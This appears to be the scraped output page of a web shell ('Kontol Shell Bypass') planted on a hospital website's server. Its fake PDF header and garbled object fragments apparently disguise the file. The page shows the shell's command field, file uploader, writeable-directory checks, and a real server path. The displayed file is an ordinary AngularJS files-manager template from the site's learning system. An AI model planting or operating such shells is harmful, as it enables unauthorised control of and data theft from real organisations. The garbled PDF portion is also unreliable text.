%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/lms/views/master/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/lms/views/master/files_manager.html
<div class="page-bar">
    <ul class="page-breadcrumb uc">
        <li><h2>Files Manager</h2></li>
    </ul>
    <div class="page-toolbar">
        <a href="" class="btn blue btn-outline pull-right" ng-click="CR.openForm()"><i class="fa fa-plus"></i> Add New</a>
    </div>
</div>
<!-- -->

<!-- Search -->
<div class="form-group">
    <form ng-submit="CR.lists()">
        <div class="form-inline fc-sm">
            <input type="text" ng-model="CR.sdata.k" class="form-control w200" placeholder="Keyword..." />&nbsp;
            <button type="submit" class="btn btn-info">Search</button>
        </div>
    </form>
</div>
<!-- / -->

<div>
    <div ng-if="CR.result.length">
        <div class="text-secondary bold mb10">
            Showing {{CR.page.start+1}} - {{CR.page.start+CR.page.total}} of {{CR.page.total_records}} records.
        </div>
        <div class="table-responsive">
            <table class="table table-striped table-bordered table-advance table-hover">
                <thead class="vmid">
                    <tr>
                        <th class="w20">#</th>
                        <th>File</th>
                        <th class="w120">Type</th>
                        <th class="w100">Size</th>
                        <th class="w100">Is Image?</th>
                        <th class="w85"></th>
                    </tr>
                </thead>

                <tbody>
                    <tr ng-repeat="(i,r) in CR.result">
                        <td>{{i+1}}.</td>
                        <td>
                            {{r.title}}
                            <div class="pdT5">
                                <div class="input-group input-group-sm">
                                    <input type="text" class="form-control" value="{{r.file_url}}" readonly>
                                    <span class="input-group-addon" title="Click to copy" onclick="copyToClipboard(this)" style="cursor: pointer;">
                                        <i class="fa fa-copy font-dark"></i>
                                    </span>
                                </div>
                            </div>
                        </td>
                        <td>{{r.file_ext}}</td>
                        <td>{{r.file_size}}KB</td>
                        <td>{{r.is_image?'Yes':'No'}}</td>
                        <td class="text-center">
                            <div class="btn-group btn-group-solid">
                                <button type="button" class="btn btn-xs default" ng-click="CR.edit(r.id, r.title)"><i class="fa fa-edit"></i></button>
                                <button type="button" class="btn btn-xs red" ng-click="CR.delete(r.id)"><i class="fa fa-trash-o"></i></button>
                            </div>
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>
    </div>
    <div class="text-center text-default pd20" ng-if="!CR.result.length">No record found.</div>
</div>

<!-- Form -->
<div class="modal bs-modal-lg in" id="formModal" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                <h4 class="modal-title">{{CR.data.id?'Update':'Add'}} File</h4>
            </div>
            
            <div class="modal-body fi-300 err-abs">
                <form id="frm" autocomplete="off" spellcheck="false">
                    <input type="hidden" name="id" value="{{CR.data.id}}" />
                    <table class="form-tbl">
                        <tr>
                            <td class="req">Title</td>
                            <td><input type="text" class="form-control" name="title" ng-model="CR.data.title" maxlength="100"></td>
                        </tr>
                        
                        <tr ng-if="!CR.data.id">
                            <td class="req">File</td>
                            <td>
                                <input type="file" name="file" class="form-control">
                                <div class="note-text">gif|jpg|png|pdf|doc|xls|ppt|docx|xlsx|pptx</div>
                            </td>
                        </tr>
                    </table>
                </form>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal">Close</button>
                <button type="button" class="btn green" ng-click="CR.save()">Save</button>
            </div>
        </div>
    </div>
</div>

Kontol Shell Bypass